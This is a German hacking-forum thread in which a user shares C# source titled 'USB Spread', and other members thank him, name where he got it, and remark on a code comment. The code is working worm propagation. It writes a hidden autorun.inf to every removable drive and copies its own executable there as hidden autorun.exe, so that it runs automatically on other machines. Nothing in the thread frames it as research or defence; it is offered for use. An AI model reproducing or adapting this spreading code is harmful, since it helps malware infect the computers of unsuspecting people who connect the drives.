Ergebnis 1 bis 5 von 5
  1. #1
    Richard Stallman Avatar von Sawyer
    Registriert seit
    26.07.2008
    Beiträge
    2.037

    Standard [C# Source] - USB Spread

    Author: t0fx

    Code:
    ///////////////////////////////////////////////////////////////
    // USB spread class by t0fx, plz give credits if you use it !//
    ///////////////////////////////////////////////////////////////
    
    using System;
    using System.Net;
    using System.IO;
    using System.Management;
    using System.Collections.Generic;
    using System.Windows.Forms;
    
    class USBspread
    {
    
    
        static void Main(string[] args)
        {
    
            try
            {
                System.IO.DriveInfo[] drives = System.IO.DriveInfo.GetDrives();  // we find all removable drives
                foreach (System.IO.DriveInfo drive in drives)
                {
                    if (drive.DriveType == DriveType.Removable)
                    {
                        StreamWriter sw = new StreamWriter(drive.Name + "autorun.inf"); // create the autorun.inf
                        sw.WriteLine("[autorun]");
                        sw.WriteLine("open=autorun.exe");
                        sw.Close();
                        File.SetAttributes(drive.Name + "autorun.inf", File.GetAttributes(drive.Name + "autorun.inf") | FileAttributes.Hidden); // We put autorun.inf hidden
    
                        string appPath = System.Diagnostics.Process.GetCurrentProcess().MainModule.FileName;
    
                        try
                        {
                            File.Copy(appPath, drive.Name + "autorun.exe", true);  // We copy our exe into the removable drive
                            File.SetAttributes(drive.Name + "autorun.exe", File.GetAttributes(drive.Name + "autorun.exe") | FileAttributes.Hidden);  // attribute hidden
    
                        }
                        finally
                        {
                            Console.WriteLine("Found removable drive {0}", drive.Name + "... // Successfully rooted! //");
                        }
                    }
                    else
                    {
                        Console.WriteLine("Not Removable drive : {0}", drive.Name);
                    }
                }
    
            }
            catch (Exception e)
            {
    
                Console.WriteLine(e.ToString());
            }
        }
    }
    MfG

  2. #2
    Trojaner Avatar von ToD5K
    Registriert seit
    21.09.2008
    Beiträge
    76

    Standard

    Schon lange keine C# Sources hier gesehen..
    Kann ich gut gebrauchen danke!
    Btw wo hast du den Src gefunden wenn ich fragen darf?

  3. #3
    Richard Stallman Avatar von Sawyer
    Registriert seit
    26.07.2008
    Beiträge
    2.037

    Standard

    Zitat Zitat von ToD5K Beitrag anzeigen
    Schon lange keine C# Sources hier gesehen..
    Kann ich gut gebrauchen danke!
    Btw wo hast du den Src gefunden wenn ich fragen darf?
    hackhound

    MfG

  4. #4
    Linus Torvalds Avatar von kInGoFcHaOs
    Registriert seit
    25.11.2006
    Beiträge
    1.107

    Standard

    PHP-Code:
                System.IO.DriveInfo[] drives System.IO.DriveInfo.GetDrives();  // we find all removable drives 

    der Kommentar ist falsch ^^
    aber sonst sieht der src ganz i.o aus

  5. #5
    ¯\ (ツ) /¯ Avatar von p0se
    Registriert seit
    23.07.2007
    Beiträge
    309

    Standard

    oh kann ich gut gebrauchen thx
    ...

Stichworte

Berechtigungen

  • Neue Themen erstellen: Nein
  • Themen beantworten: Nein
  • Anhänge hochladen: Nein
  • Beiträge bearbeiten: Nein
  •